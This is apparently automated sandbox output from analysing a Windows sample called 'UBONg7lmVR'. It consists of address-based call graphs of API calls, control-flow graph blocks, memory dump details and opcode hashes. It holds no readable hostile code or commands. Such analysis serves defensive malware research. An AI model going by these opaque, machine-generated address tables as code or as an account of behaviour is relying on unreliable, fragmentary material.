69716->69710 69717->69710 69718->69710 69719->69710 69720->69710 69721->69710 69722->69710 69723->69710 69724->69710 69725->69710 69726->69710 69727->69710 69728->69710 69729->69710 69730->69710 69731->69710 69732->69710 69733->69710 69734->69710 69735->69710 69736->69710 69737->69710 69738->69710 69739->69710 69741 5bd03ce 69740->69741 69742 5bd04a6 69741->69742 69743 5bd04c8 DrawTextExW 69741->69743 69744 5bd04c5 DrawTextExW 69741->69744 69745 5bd05e1 DrawTextExW 69741->69745 69742->69678 69743->69742 69744->69742 69745->69742 69747 5bd03ce 69746->69747 69748 5bd04a6 69747->69748 69749 5bd04c8 DrawTextExW 69747->69749 69750 5bd04c5 DrawTextExW 69747->69750 69751 5bd05e1 DrawTextExW 69747->69751 69748->69678 69749->69748 69750->69748 69751->69748 69753 5bd03ce 69752->69753 69754 5bd04a6 69753->69754 69755 5bd04c8 DrawTextExW 69753->69755 69756 5bd04c5 DrawTextExW 69753->69756 69757 5bd05e1 DrawTextExW 69753->69757 69754->69678 69755->69754 69756->69754 69757->69754 69759 5bd03ce 69758->69759 69760 5bd04a6 69759->69760 69761 5bd04c8 DrawTextExW 69759->69761 69762 5bd04c5 DrawTextExW 69759->69762 69763 5bd05e1 DrawTextExW 69759->69763 69760->69678 69761->69760 69762->69760 69763->69760 69765 5bd03ce 69764->69765 69766 5bd04a6 69765->69766 69767 5bd04c8 DrawTextExW 69765->69767 69768 5bd04c5 DrawTextExW 69765->69768 69769 5bd05e1 DrawTextExW 69765->69769 69766->69678 69767->69766 69768->69766 69769->69766 69771 5bd03ce 69770->69771 69772 5bd04a6 69771->69772 69773 5bd04c8 DrawTextExW 69771->69773 69774 5bd04c5 DrawTextExW 69771->69774 69775 5bd05e1 DrawTextExW 69771->69775 69772->69678 69773->69772 69774->69772 69775->69772 69777 5bd03ce 69776->69777 69778 5bd04a6 69777->69778 69779 5bd04c8 DrawTextExW 69777->69779 69780 5bd04c5 DrawTextExW 69777->69780 69781 5bd05e1 DrawTextExW 69777->69781 69778->69678 69779->69778 69780->69778 69781->69778 69783 5bd03ce 69782->69783 69784 5bd04a6 69783->69784 69785 5bd04c8 DrawTextExW 69783->69785 69786 5bd04c5 DrawTextExW 69783->69786 69787 5bd05e1 DrawTextExW 69783->69787 69784->69678 69785->69784 69786->69784 69787->69784 69789 5bd03ce 69788->69789 69790 5bd04a6 69789->69790 69791 5bd04c8 DrawTextExW 69789->69791 69792 5bd04c5 DrawTextExW 69789->69792 69793 5bd05e1 DrawTextExW 69789->69793 69790->69678 69791->69790 69792->69790 69793->69790 69795 5bd03ce 69794->69795 69796 5bd04a6 69795->69796 69797 5bd04c8 DrawTextExW 69795->69797 69798 5bd04c5 DrawTextExW 69795->69798 69799 5bd05e1 DrawTextExW 69795->69799 69796->69678 69797->69796 69798->69796 69799->69796 69801 5bd03ce 69800->69801 69802 5bd04a6 69801->69802 69803 5bd04c8 DrawTextExW 69801->69803 69804 5bd04c5 DrawTextExW 69801->69804 69805 5bd05e1 DrawTextExW 69801->69805 69802->69678 69803->69802 69804->69802 69805->69802 69807 5bd03ce 69806->69807 69808 5bd04a6 69807->69808 69809 5bd04c8 DrawTextExW 69807->69809 69810 5bd04c5 DrawTextExW 69807->69810 69811 5bd05e1 DrawTextExW 69807->69811 69808->69678 69809->69808 69810->69808 69811->69808 69813 5bd03ce 69812->69813 69814 5bd04a6 69813->69814 69815 5bd04c8 DrawTextExW 69813->69815 69816 5bd04c5 DrawTextExW 69813->69816 69817 5bd05e1 DrawTextExW 69813->69817 69814->69678 69815->69814 69816->69814 69817->69814 69819 5bd03ce 69818->69819 69820 5bd04a6 69819->69820 69821 5bd04c8 DrawTextExW 69819->69821 69822 5bd04c5 DrawTextExW 69819->69822 69823 5bd05e1 DrawTextExW 69819->69823 69820->69678 69821->69820 69822->69820 69823->69820 69825 5bd03ce 69824->69825 69826 5bd04a6 69825->69826 69827 5bd04c8 DrawTextExW 69825->69827 69828 5bd04c5 DrawTextExW 69825->69828 69829 5bd05e1 DrawTextExW 69825->69829 69826->69678 69827->69826 69828->69826 69829->69826 69831 5bd03ce 69830->69831 69832 5bd04a6 69831->69832 69833 5bd04c8 DrawTextExW 69831->69833 69834 5bd04c5 DrawTextExW 69831->69834 69835 5bd05e1 DrawTextExW 69831->69835 69832->69678 69833->69832 69834->69832 69835->69832 69837 5bd03ce 69836->69837 69838 5bd04a6 69837->69838 69839 5bd04c8 DrawTextExW 69837->69839 69840 5bd04c5 DrawTextExW 69837->69840 69841 5bd05e1 DrawTextExW 69837->69841 69838->69678 69839->69838 69840->69838 69841->69838 69843 5bd03ce 69842->69843 69843->69842 69844 5bd04a6 69843->69844 69845 5bd04c8 DrawTextExW 69843->69845 69846 5bd04c5 DrawTextExW 69843->69846 69847 5bd05e1 DrawTextExW 69843->69847 69844->69678 69845->69844 69846->69844 69847->69844 69849 5bd03ce 69848->69849 69850 5bd04a6 69849->69850 69851 5bd04c8 DrawTextExW 69849->69851 69852 5bd04c5 DrawTextExW 69849->69852 69853 5bd05e1 DrawTextExW 69849->69853 69850->69678 69851->69850 69852->69850 69853->69850 69855 5bd03ce 69854->69855 69856 5bd04a6 69855->69856 69857 5bd04c8 DrawTextExW 69855->69857 69858 5bd04c5 DrawTextExW 69855->69858 69859 5bd05e1 DrawTextExW 69855->69859 69856->69678 69857->69856 69858->69856 69859->69856 69861 5bd03ce 69860->69861 69862 5bd04a6 69861->69862 69863 5bd04c8 DrawTextExW 69861->69863 69864 5bd04c5 DrawTextExW 69861->69864 69865 5bd05e1 DrawTextExW 69861->69865 69862->69678 69863->69862 69864->69862 69865->69862 69867 5bd03ce 69866->69867 69868 5bd04a6 69867->69868 69869 5bd04c8 DrawTextExW 69867->69869 69870 5bd04c5 DrawTextExW 69867->69870 69871 5bd05e1 DrawTextExW 69867->69871 69868->69678 69869->69868 69870->69868 69871->69868 69873 5bd03ce 69872->69873 69874 5bd04a6 69873->69874 69875 5bd04c8 DrawTextExW 69873->69875 69876 5bd04c5 DrawTextExW 69873->69876 69877 5bd05e1 DrawTextExW 69873->69877 69874->69678 69875->69874 69876->69874 69877->69874 69879 5bd0479 69878->69879 69880 5bd04a6 69879->69880 69881 5bd04c8 DrawTextExW 69879->69881 69882 5bd04c5 DrawTextExW 69879->69882 69883 5bd05e1 DrawTextExW 69879->69883 69880->69678 69881->69880 69882->69880 69883->69880 69885 5bd03ce 69884->69885 69886 5bd04a6 69885->69886 69887 5bd04c8 DrawTextExW 69885->69887 69888 5bd04c5 DrawTextExW 69885->69888 69889 5bd05e1 DrawTextExW 69885->69889 69886->69678 69887->69886 69888->69886 69889->69886 69891 5bd03ce 69890->69891 69892 5bd04a6 69891->69892 69893 5bd04c8 DrawTextExW 69891->69893 69894 5bd04c5 DrawTextExW 69891->69894 69895 5bd05e1 DrawTextExW 69891->69895 69892->69678 69893->69892 69894->69892 69895->69892 69897 5bd03ce 69896->69897 69898 5bd04a6 69897->69898 69899 5bd04c8 DrawTextExW 69897->69899 69900 5bd04c5 DrawTextExW 69897->69900 69901 5bd05e1 DrawTextExW 69897->69901 69898->69678 69899->69898 69900->69898 69901->69898 69903 5bd03ce 69902->69903 69904 5bd04a6 69903->69904 69905 5bd04c8 DrawTextExW 69903->69905 69906 5bd04c5 DrawTextExW 69903->69906 69907 5bd05e1 DrawTextExW 69903->69907 69904->69678 69905->69904 69906->69904 69907->69904 69909 5bd03ce 69908->69909 69910 5bd04a6 69909->69910 69911 5bd04c8 DrawTextExW 69909->69911 69912 5bd04c5 DrawTextExW 69909->69912 69913 5bd05e1 DrawTextExW 69909->69913 69910->69678 69911->69910 69912->69910 69913->69910 69914 5bdf818 69915 5bdf825 69914->69915 69919 5bdf848 69915->69919 69924 5bdf844 69915->69924 69916 5bdf834 69920 5bdf858 69919->69920 69922 5bdd4b8 SendMessageW 69920->69922 69923 5bdd4b0 SendMessageW 69920->69923 69921 5bdf869 69921->69916 69922->69921 69923->69921 69925 5bdf858 69924->69925 69927 5bdd4b8 SendMessageW 69925->69927 69928 5bdd4b0 SendMessageW 69925->69928 69926 5bdf869 69926->69916 69927->69926 69928->69926 69929 5b4e118 69930 5b4e15e 69929->69930 69934 5b4e2f8 69930->69934 69937 5b4e2e7 69930->69937 69931 5b4e24b 69941 5b4c3c8 69934->69941 69938 5b4e2f8 69937->69938 69939 5b4c3c8 DuplicateHandle 69938->69939 69940 5b4e326 69939->69940 69940->69931 69942 5b4e360 DuplicateHandle 69941->69942 69943 5b4e326 69942->69943 69943->69931 70484 5bdfec8 70485 5bdfed8 70484->70485 70486 5bdb194 SendMessageW 70485->70486 70487 5bdfee9 70486->70487 69944 989f430 69946 98598c8 DrawTextExW 69944->69946 69945 989f435 69946->69945 69949 b3a8780 69950 b3a878f 69949->69950 69953 b3a87ae 69950->69953 69954 b3a8880 69950->69954 69958 b3a8870 69950->69958 69955 b3a888e 69954->69955 69956 b3a8899 KiUserCallbackDispatcher 69955->69956 69957 b3a88a2 69955->69957 69956->69957 69957->69953 69959 b3a888e 69958->69959 69960 b3a8899 KiUserCallbackDispatcher 69959->69960 69961 b3a88a2 69959->69961 69960->69961 69961->69953 70488 59bd060 70489 59bd078 70488->70489 70490 59bd0d2 70489->70490 70493 985049c 3 API calls 70489->70493 70497 9852ac8 70489->70497 70503 985048c 70489->70503 70507 9853819 70489->70507 70516 9852bf1 70489->70516 70519 9852ab7 70489->70519 70493->70490 70498 9852aee 70497->70498 70499 985048c SetWindowLongW 70498->70499 70500 9852afa 70499->70500 70501 985049c 3 API calls 70500->70501 70502 9852b0f 70501->70502 70502->70490 70504 9850497 70503->70504 70525 98504c4 70504->70525 70506 9852c07 70506->70490 70510 9853822 70507->70510 70508 9853889 70509 98505c4 3 API calls 70508->70509 70512 9853887 70509->70512 70510->70508 70511 9853879 70510->70511 70513 98539a0 3 API calls 70511->70513 70514 98539b0 3 API calls 70511->70514 70515 9853a7c 3 API calls 70511->70515 70513->70512 70514->70512 70515->70512 70517 9852c07 70516->70517 70518 98504c4 SetWindowLongW 70516->70518 70517->70490 70518->70517 70520 9852abe 70519->70520 70520->70520 70521 985048c SetWindowLongW 70520->70521 70522 9852afa 70521->70522 70523 985049c 3 API calls 70522->70523 70524 9852b0f 70523->70524 70524->70490 70526 98504cf 70525->70526 70527 9852e96 70526->70527 70528 9852b28 SetWindowLongW 70526->70528 70528->70527 69962 9855038 69963 9855048 69962->69963 69964 9855071 69963->69964 69969 5bdf540 69963->69969 69979 5bdf53b 69963->69979 69989 5bdcbb0 69963->69989 69993 5bdcbb8 69963->69993 69970 5bdf548 69969->69970 69971 5bdf5c8 69970->69971 69972 5bd3cdc 2 API calls 69970->69972 69997 9856788 69971->69997 69972->69971 69973 5bdf5d2 69974 5bd3cdc 2 API calls 69973->69974 69975 5bdf624 69973->69975 69974->69975 69976 5bdf6cf 69975->69976 70009 5bdc8a4 69975->70009 69981 5bdf540 69979->69981 69980 5bdf5c8 69988 9856788 6 API calls 69980->69988 69981->69980 69982 5bd3cdc 2 API calls 69981->69982 69982->69980 69983 5bdf5d2 69984 5bd3cdc 2 API calls 69983->69984 69985 5bdf624 69983->69985 69984->69985 69986 5bdf6cf 69985->69986 69987 5bdc8a4 2 API calls 69985->69987 69987->69985 69988->69983 69990 5bdcbb8 69989->69990 70015 9856a34 69990->70015 69991 5bdcc42 69991->69964 69994 5bdcbed 69993->69994 69996 9856a34 6 API calls 69994->69996 69995 5bdcc42 69995->69964 69996->69995 69998 98567b4 69997->69998 69999 98569ec 69998->69999 70014 985619c 6 API calls 69998->70014 70001 98551b0 6 API calls 69999->70001 70002 9856b94 69999->70002 70001->70002 70002->69973 70003 985686d 70004 98551b0 6 API calls 70003->70004 70008 9856915 70003->70008 70005 98568df 70004->70005 70006 98551b0 6 API calls 70005->70006 70006->70008 70007 98551b0 6 API calls 70007->69999 70008->70007 70010 5bdc8af 70009->70010 70012 5bdfb28 PostMessageW 70010->70012 70013 5bdfb20 PostMessageW 70010->70013 70011 5bdf982 70011->69975 70012->70011 70013->70011 70014->70003 70016 9856a3d 70015->70016 70018 9856a5b 70015->70018 70017 98551b0 6 API calls 70016->70017 70016->70018 70017->70018 70019 98551b0 6 API calls 70018->70019 70020 9856b94 70018->70020 70019->70020 70020->69991

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 557 9858238-985828b 562 9858295-9858299 call 9857d38 557->562 564 985829e-98582a9 562->564 566 98582b3-98582b7 call 9857d48 564->566 568 98582bc-98582e5 call 9857d58 566->568 574 98582ef-98582f3 call 9857d68 568->574 576 98582f8-985835d call 9857d68 call 9857d78 call 9857d88 574->576 590 9858367-985836b call 9857d98 576->590 592 9858370-98583ca call 9857d98 call 9857d58 call 9857d48 590->592 605 98583d5-98583db 592->605 839 98583dd call 985b041 605->839 840 98583dd call 985afd0 605->840 841 98583dd call 985afe0 605->841 842 98583dd call 985af68 605->842 606 98583e2-9858414 611 985841b-9858428 call 9857da8 606->611 613 985842d-9858435 call 9857db8 611->613 615 985843a-9858444 613->615 852 9858447 call 985cab7 615->852 853 9858447 call 985cac8 615->853 616 985844a-9858515 call 9857db8 call 9857dc8 call 9857dd8 call 9857de8 call 9857df8 call 9857e08 630 985851e-9858531 616->630 843 9858534 call 9895718 630->843 844 9858534 call 9895720 630->844 631 9858537-985855c call 9857db8 * 2 636 9858561-985856e call 9895de3 631->636 637 9858571-9858699 call 9857db8 * 3 call 9857e18 call 9857dd8 call 9857e38 call 9857df8 call 9857e48 636->637 657 985869e-98586ac 637->657 845 98586af call 98598b0 657->845 846 98586af call 98598ac 657->846 658 98586b1-98586d8 call 9857e58 662 98586f0-985873d call 9857e68 call 9857dc8 call 9857dd8 658->662 663 98586da-98586e0 658->663 671 9858742-9858771 call 9857df8 662->671 664 98586e4-98586e6 663->664 665 98586e2 663->665 664->662 665->662 673 9858776-98587a1 call 9857e78 call 9857e88 call 9857e98 671->673 679 98587a6-98587b3 673->679 859 98587b6 call 989aaa8 679->859 860 98587b6 call 989aaa0 679->860 680 98587b9-98587e4 call 9857ea8 683 98587e9-98587f0 680->683 847 98587f3 call 989e9e8 683->847 848 98587f3 call 989e9e3 683->848 684 98587f6-98589c2 call 9857dc8 call 9857dd8 call 9857df8 call 9857e08 call 9857ea8 call 9857dc8 call 9857dd8 call 9857df8 call 9857e08 708 98589c7-98589e8 684->708 709 98589f3-9858e3f call 9857db8 * 3 call 9857dc8 call 9857dd8 call 9857df8 call 9857e08 call 9857eb8 call 9857dc8 call 9857dd8 call 9857df8 call 9857e08 call 9857ec8 call 9857dc8 call 9857dd8 call 9857df8 call 9857e08 call 9857ed8 call 9857ee8 call 9857dc8 call 9857dd8 call 9857df8 call 9857e08 call 9857ed8 call 9857ee8 708->709 774 9858e44-9858e51 709->774 854 9858e54 call 5bd2608 774->854 855 9858e54 call 5bd26b4 774->855 856 9858e54 call 5bd26c0 774->856 775 9858e57-9858fbe call 9857e68 call 9857dc8 call 9857dd8 call 9857df8 call 9857ef8 call 9857e78 call 9857e88 call 9857e18 call 9857dd8 796 9858fc6-9858fea call 9857e38 775->796 798 9858fef-9859120 call 9857df8 call 9857e48 call 9857f08 call 9857f18 call 9857f28 call 9857f38 call 9857db8 796->798 817 9859126-985912d call 9857f48 798->817 819 9859132-9859168 call 9857f58 call 9857f68 call 9857dd8 817->819 827 985916d-9859174 call 9857f78 819->827 829 9859179-9859183 827->829 830 9859188-9859190 829->830 857 9859192 call 9894f88 830->857 858 9859192 call 9894f98 830->858 831 9859197-985919f 832 98591a6-98591ae call 9857f88 831->832 834 98591b3-98591ce 832->834 837 98591da-98591dc 834->837 849 98591de call 9894f88 837->849 850 98591de call 9894f98 837->850 838 98591e3-98591ea 839->606 840->606 841->606 842->606 843->631 844->631 845->658 846->658 847->684 848->684 849->838 850->838 852->616 853->616 854->775 855->775 856->775 857->831 858->831 859->680 860->680
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556650373.0000000009850000.00000040.00000800.00020000.00000000.sdmp, Offset: 09850000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9850000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ($2$K$K$X$i
                                                  • API String ID: 0-301893868
                                                  • Opcode ID: 75baa17088d94a3ece6fa7f35ea3a1ba1398a164f58fa30c6b429967e2f23b4a
                                                  • Instruction ID: 23018425eeca844e4b5fa1667035669f583605202057a4e31a16614f58ce4e96
                                                  • Opcode Fuzzy Hash: 75baa17088d94a3ece6fa7f35ea3a1ba1398a164f58fa30c6b429967e2f23b4a
                                                  • Instruction Fuzzy Hash: A8A20A30A10705CFC725EF78C854AA9B7B2FF8A305F5189ADD54AAB360DB31A985CF41

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 861 9858248-98583db call 9857d38 call 9857d48 call 9857d58 call 9857d68 * 2 call 9857d78 call 9857d88 call 9857d98 * 2 call 9857d58 call 9857d48 1146 98583dd call 985b041 861->1146 1147 98583dd call 985afd0 861->1147 1148 98583dd call 985afe0 861->1148 1149 98583dd call 985af68 861->1149 909 98583e2-9858444 call 9857da8 call 9857db8 1159 9858447 call 985cab7 909->1159 1160 9858447 call 985cac8 909->1160 919 985844a-9858531 call 9857db8 call 9857dc8 call 9857dd8 call 9857de8 call 9857df8 call 9857e08 1150 9858534 call 9895718 919->1150 1151 9858534 call 9895720 919->1151 934 9858537-98586ac call 9857db8 * 2 call 9895de3 call 9857db8 * 3 call 9857e18 call 9857dd8 call 9857e38 call 9857df8 call 9857e48 1152 98586af call 98598b0 934->1152 1153 98586af call 98598ac 934->1153 961 98586b1-98586d8 call 9857e58 965 98586f0-98587b3 call 9857e68 call 9857dc8 call 9857dd8 call 9857df8 call 9857e78 call 9857e88 call 9857e98 961->965 966 98586da-98586e0 961->966 1144 98587b6 call 989aaa8 965->1144 1145 98587b6 call 989aaa0 965->1145 967 98586e4-98586e6 966->967 968 98586e2 966->968 967->965 968->965 983 98587b9-98587f0 call 9857ea8 1154 98587f3 call 989e9e8 983->1154 1155 98587f3 call 989e9e3 983->1155 987 98587f6-9858e51 call 9857dc8 call 9857dd8 call 9857df8 call 9857e08 call 9857ea8 call 9857dc8 call 9857dd8 call 9857df8 call 9857e08 call 9857db8 * 3 call 9857dc8 call 9857dd8 call 9857df8 call 9857e08 call 9857eb8 call 9857dc8 call 9857dd8 call 9857df8 call 9857e08 call 9857ec8 call 9857dc8 call 9857dd8 call 9857df8 call 9857e08 call 9857ed8 call 9857ee8 call 9857dc8 call 9857dd8 call 9857df8 call 9857e08 call 9857ed8 call 9857ee8 1161 9858e54 call 5bd2608 987->1161 1162 9858e54 call 5bd26b4 987->1162 1163 9858e54 call 5bd26c0 987->1163 1078 9858e57-9859190 call 9857e68 call 9857dc8 call 9857dd8 call 9857df8 call 9857ef8 call 9857e78 call 9857e88 call 9857e18 call 9857dd8 call 9857e38 call 9857df8 call 9857e48 call 9857f08 call 9857f18 call 9857f28 call 9857f38 call 9857db8 call 9857f48 call 9857f58 call 9857f68 call 9857dd8 call 9857f78 1142 9859192 call 9894f88 1078->1142 1143 9859192 call 9894f98 1078->1143 1134 9859197-98591dc call 9857f88 1156 98591de call 9894f88 1134->1156 1157 98591de call 9894f98 1134->1157 1141 98591e3-98591ea 1142->1134 1143->1134 1144->983 1145->983 1146->909 1147->909 1148->909 1149->909 1150->934 1151->934 1152->961 1153->961 1154->987 1155->987 1156->1141 1157->1141 1159->919 1160->919 1161->1078 1162->1078 1163->1078
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556650373.0000000009850000.00000040.00000800.00020000.00000000.sdmp, Offset: 09850000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9850000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ($2$K$K$X$i
                                                  • API String ID: 0-301893868
                                                  • Opcode ID: 8352642f65f36a33beb4c2a4c98613effc4f31449f93bcc92705466f7546a769
                                                  • Instruction ID: ef5c9ee10e3938141d450f63673b66f9c3ae41ef26908cdec8f36e0041a7a536
                                                  • Opcode Fuzzy Hash: 8352642f65f36a33beb4c2a4c98613effc4f31449f93bcc92705466f7546a769
                                                  • Instruction Fuzzy Hash: 42A21A30A10705CFC725EF78C854AA9B7B2FF8A305F5189ADD54AAB360DB31A985CF41

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1419 ad1b821-ad1b845 call ad1a7b0 1422 ad1b855-ad1b85e 1419->1422 1423 ad1b847-ad1b84a 1419->1423 1425 ad1b866-ad1b868 1422->1425 1423->1422 1424 ad1b84c-ad1b84f 1423->1424 1424->1422 1426 ad1b975-ad1b986 1424->1426 1427 ad1b93c-ad1b946 1425->1427 1428 ad1b86e-ad1b87e 1425->1428 1435 ad1b987-ad1b9a1 1426->1435 1429 ad1b880-ad1b885 1428->1429 1430 ad1b887-ad1b88c 1428->1430 1432 ad1b8b7-ad1b8df call ad1a7bc 1429->1432 1433 ad1b89c-ad1b8a1 1430->1433 1434 ad1b88e-ad1b89a 1430->1434 1441 ad1b8e5-ad1b8f8 1432->1441 1442 ad1b9ad-ad1b9c4 1432->1442 1436 ad1b8a3-ad1b8b0 1433->1436 1437 ad1b8b2-ad1b8b4 1433->1437 1434->1432 1450 ad1b9a8 1435->1450 1436->1432 1437->1432 1448 ad1b938-ad1b93a 1441->1448 1449 ad1b8fa-ad1b936 1441->1449 1442->1435 1447 ad1b9c6-ad1ba0a call ad1a7d4 1442->1447 1454 ad1ba10-ad1ba21 1447->1454 1455 ad1bb04 1447->1455 1448->1427 1448->1450 1449->1448 1450->1442 1461 ad1bad1-ad1bafd 1454->1461 1462 ad1ba27-ad1ba6f call ad1a7e0 1454->1462 1457 ad1bb09-ad1bb0d 1455->1457 1459 ad1bb21 1457->1459 1460 ad1bb0f-ad1bb1e 1457->1460 1465 ad1bb22 1459->1465 1460->1459 1461->1455 1478 ad1ba71-ad1ba96 1462->1478 1479 ad1ba98-ad1ba9c 1462->1479 1465->1465 1478->1457 1480 ad1bab5-ad1bacf 1479->1480 1481 ad1ba9e-ad1bab0 call ad1a7e0 1479->1481 1480->1457 1481->1480
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3557744285.000000000AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AD10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ad10000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $Huq
                                                  • API String ID: 0-334792489
                                                  • Opcode ID: 1e927957361bb66e22b3c77f36d52617031f7ecac473055c806081d17eea27c5
                                                  • Instruction ID: 0cf34af12d47bc129ad7a181b1b72b2df1bfedbc017082c07b0b9317a7152abd
                                                  • Opcode Fuzzy Hash: 1e927957361bb66e22b3c77f36d52617031f7ecac473055c806081d17eea27c5
                                                  • Instruction Fuzzy Hash: BA718271E00215AFDB14DF79D4845AFBBF6EF88300B15842AE415EB350EB31D905CBA5

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1630 b3a1593-b3a1595 1631 b3a15c7-b3a16b7 1630->1631 1632 b3a1597-b3a15c5 1630->1632 1637 b3a178e-b3a1798 1631->1637 1638 b3a16bd-b3a1789 1631->1638 1632->1631 1639 b3a179e-b3a17e6 1637->1639 1640 b3a1935-b3a1abb 1637->1640 1648 b3a1ac7-b3a1ad3 1638->1648 1643 b3a17f2-b3a1930 1639->1643 1640->1648 1643->1648 1651 b3a1b08-b3a1b31 1648->1651 1652 b3a1ad5-b3a1adc 1648->1652 1656 b3a1ba4-b3a1bf9 1651->1656 1654 b3a1ade-b3a1ae3 1652->1654 1655 b3a1ae5-b3a1aec 1652->1655 1658 b3a1b04-b3a1b06 1654->1658 1659 b3a1aee-b3a1af0 1655->1659 1660 b3a1af2-b3a1b01 1655->1660 1668 b3a1bfb 1656->1668 1669 b3a1c04-b3a1c97 1656->1669 1658->1651 1662 b3a1b33-b3a1b9d 1658->1662 1659->1658 1660->1658 1662->1656 1668->1669 1670 b3a1bfd 1668->1670 1679 b3a1c99 1669->1679 1680 b3a1ca2-b3a1d16 1669->1680 1670->1669 1679->1680 1681 b3a1c9b 1679->1681 1689 b3a1d1c-b3a1dc1 1680->1689 1690 b3a1dd1-b3a1e07 1680->1690 1681->1680 1689->1690 1693 b3a1dc3-b3a1dd0 1689->1693 1695 b3a1e1b-b3a1e28 1690->1695 1696 b3a1e09 1690->1696 1693->1690 1701 b3a1e29-b3a1e33 1695->1701 1696->1695 1698 b3a1e0b-b3a1e19 1696->1698 1698->1701 1702 b3a1ea3-b3a1eb3 1701->1702 1703 b3a1e35-b3a1e4d 1701->1703 1706 b3a1eb4-b3a1ec5 1702->1706 1703->1706 1707 b3a1e4f-b3a1e56 1703->1707 1732 b3a1ec7 call 989d350 1706->1732 1733 b3a1ec7 call 989ba14 1706->1733 1708 b3a1e58-b3a1e5d 1707->1708 1709 b3a1e5f-b3a1e66 1707->1709 1711 b3a1e7e-b3a1e80 1708->1711 1712 b3a1e68-b3a1e6a 1709->1712 1713 b3a1e6c-b3a1e7b 1709->1713 1711->1706 1714 b3a1e82-b3a1ea1 1711->1714 1712->1711 1713->1711 1714->1706 1716 b3a1ecc-b3a2014 1730 b3a2022 1716->1730 1731 b3a2016 1716->1731 1731->1730 1732->1716 1733->1716
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3559158420.000000000B3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b3a0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: fff?
                                                  • API String ID: 0-4136771917
                                                  • Opcode ID: 973365fd73a03ce86a0c38a4e9a7a0a34a4627b838050ed60aff00dcaefdb274
                                                  • Instruction ID: 43ce6e29a7f9d147f68ebe308bf9050434abcf8a8cd377bfc98d405c5486c714
                                                  • Opcode Fuzzy Hash: 973365fd73a03ce86a0c38a4e9a7a0a34a4627b838050ed60aff00dcaefdb274
                                                  • Instruction Fuzzy Hash: D6621932810A1ADBCF11DF50C884AD9BBB2FF99304F1586D5E9087B125EB71AAD5CF80
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3559158420.000000000B3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b3a0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 99d240c8b839f70ae3916e6b0b93592726cd67c8645f2ab43cf2fee0da44d622
                                                  • Instruction ID: 82195afdd907a268b62e44e25e26869a545fb9044cd0000296d852f9b6c4b4c3
                                                  • Opcode Fuzzy Hash: 99d240c8b839f70ae3916e6b0b93592726cd67c8645f2ab43cf2fee0da44d622
                                                  • Instruction Fuzzy Hash: 85523B35910619CFCB25DF64C854AE9BBB5FF89304F2485D9E409AB261EB35EAC2CF40
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3559158420.000000000B3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b3a0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d94f909caf62115ef723651f75c416bcfb5abece35cc4e43f73ea7e2304c3ded
                                                  • Instruction ID: e9cdae8c03c9c86ee999ef84656ddd41367745dd1b6f4af4473e7c94c8ec17ac
                                                  • Opcode Fuzzy Hash: d94f909caf62115ef723651f75c416bcfb5abece35cc4e43f73ea7e2304c3ded
                                                  • Instruction Fuzzy Hash: 75321531910619CFCB21DF64C984BD9B7B2FF89304F2585E9E409AB261EB75EA85CF40
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3557744285.000000000AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AD10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ad10000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8ea454bdd7c27eb3970d21ddd44228b2022fbb573502803ff2b429e585479642
                                                  • Instruction ID: e17e94f1a87d168e0c70bd795b1a84c6e3fabc83581be5a78ff96392482e4ab7
                                                  • Opcode Fuzzy Hash: 8ea454bdd7c27eb3970d21ddd44228b2022fbb573502803ff2b429e585479642
                                                  • Instruction Fuzzy Hash: 01E15D30A00205EFDB14DFA9D988BADBBF2FF84304F568568E405AB265DB70E945DF90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556650373.0000000009850000.00000040.00000800.00020000.00000000.sdmp, Offset: 09850000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9850000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fe246c1fbb0a68a295ae65f8b29cf76d36976540974ca3ff5f699dc81cb19f86
                                                  • Instruction ID: d726211832e8a0a5b89377a3f4ed84ca9e1f11ee7cb8c77eadc0c9038e750b7f
                                                  • Opcode Fuzzy Hash: fe246c1fbb0a68a295ae65f8b29cf76d36976540974ca3ff5f699dc81cb19f86
